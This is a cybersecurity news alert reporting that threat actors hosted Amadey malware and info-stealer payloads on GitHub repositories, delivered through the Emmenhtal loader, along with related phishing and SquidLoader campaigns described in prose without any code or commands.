Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Alerts

Hackers Host Amadey Malware via GitHub Repos

July 18, 2025
Reading Time: 3 mins read
in Alerts
Malicious npm Packages Deliver Protestware

Cybersecurity researchers have uncovered a concerning trend where threat actors are leveraging legitimate public GitHub repositories to host and distribute malicious payloads, bypassing traditional web filtering and exploiting the platform’s trusted nature. This campaign, observed in April 2025, heavily utilizes the Amadey malware, which functions as a downloader for various custom payloads. These payloads, including prominent information stealers like Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer, are discreetly stored on GitHub accounts created by the attackers, making detection more challenging. The use of fake GitHub accounts and the “malware-as-a-service” model highlight a persistent and evolving threat landscape.

The attack chain for these campaigns often begins with a malware loader named Emmenhtal (also known as PEAKLIGHT).

This loader is responsible for delivering Amadey, which then fetches additional malicious components from the compromised GitHub repositories. Interestingly, tactical similarities have been noted between this April 2025 campaign and a February 2025 email phishing campaign that also employed Emmenhtal, but for distributing SmokeLoader. While both Emmenhtal and Amadey serve as downloaders for secondary payloads, Amadey distinguishes itself with its ability to collect system information and its extensibility through DLL plugins, enabling advanced functionalities like credential theft and screenshot capture.

Cisco Talos’s investigation into the April 2025 campaign specifically identified three GitHub accounts—Legendary99999, DFfe9ewf, and Milidmdds—as being used to host Amadey plugins and other malicious scripts. These accounts have since been taken down. Analysis revealed that some JavaScript files within these repositories were identical to those used in the earlier SmokeLoader campaign, with the primary difference being the final payloads delivered. Furthermore, a Python script found in the repositories suggests an evolution of Emmenhtal, incorporating a PowerShell command to download Amadey directly from a hard-coded IP address, indicating an attempt to further streamline the malicious delivery process.

Beyond the GitHub-centric Amadey campaigns, the cybersecurity community has also detailed other sophisticated phishing operations. Trellix, for instance, uncovered a campaign propagating SquidLoader, a formidable malware loader equipped with advanced anti-analysis and anti-sandbox techniques, targeting financial institutions in Hong Kong, Singapore, and Australia. SquidLoader’s primary objective is to deploy a Cobalt Strike beacon for remote access and control, posing a significant threat due to its evasive capabilities and low detection rates. These diverse campaigns underscore a broader trend of highly evasive and adaptive attack methodologies.

The current threat landscape is further characterized by a wide array of social engineering tactics. These include financially motivated groups like UNC5952 leveraging invoice-themed emails to deliver remote access software like ConnectWise ScreenConnect, and attacks employing tax-related or U.S. Social Security Administration themes for credential harvesting. The prevalence of phishing kits, such as Logokit and custom Python Flask-based kits, along with the increasing use of QR codes and cloaking-as-a-service offerings like Hoax Tech, highlights the attackers’ ingenuity in bypassing security measures. The adoption of password-protected archive attachments in emails also enables threat actors to circumvent secure email gateways, further emphasizing the need for robust and multi-layered cybersecurity defenses.

Reference:

  • Hackers Use GitHub to Spread Amadey Malware, Data Stealers While Evading Detection Filters
Tags: Cyber AlertsCyber Alerts 2025CyberattackCybersecurityJuly 2025
ADVERTISEMENT

Related Posts

Scattered Spider Hits ESXi Servers

Scattered Spider Hits ESXi Servers

July 28, 2025
Scattered Spider Hits ESXi Servers

Malware Hides in Fake Dating Apps

July 28, 2025
Scattered Spider Hits ESXi Servers

Post SMTP Bug Exposes 200K Sites

July 28, 2025
Infostealer Hidden in Steam Game

Sophos, SonicWall Patch Critical RCE Bugs

July 25, 2025
Infostealer Hidden in Steam Game

CastleLoader Uses Clickfix on Windows

July 25, 2025
Infostealer Hidden in Steam Game

Koske Malware Hides in Panda Images

July 25, 2025

Latest Alerts

Post SMTP Bug Exposes 200K Sites

Malware Hides in Fake Dating Apps

Scattered Spider Hits ESXi Servers

CastleLoader Uses Clickfix on Windows

Sophos, SonicWall Patch Critical RCE Bugs

Koske Malware Hides in Panda Images

Subscribe to our newsletter

    Latest Incidents

    Cyberattack Hits French Naval Group

    Tea App Leak Exposes 13K Women Users

    Allianz Life Data Breach Hits Majority

    Hackers Target Amazon’s AI Code Bot

    Infostealer Hidden in Steam Game

    APTs Use Fake Dalai Lama Apps to Spy

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial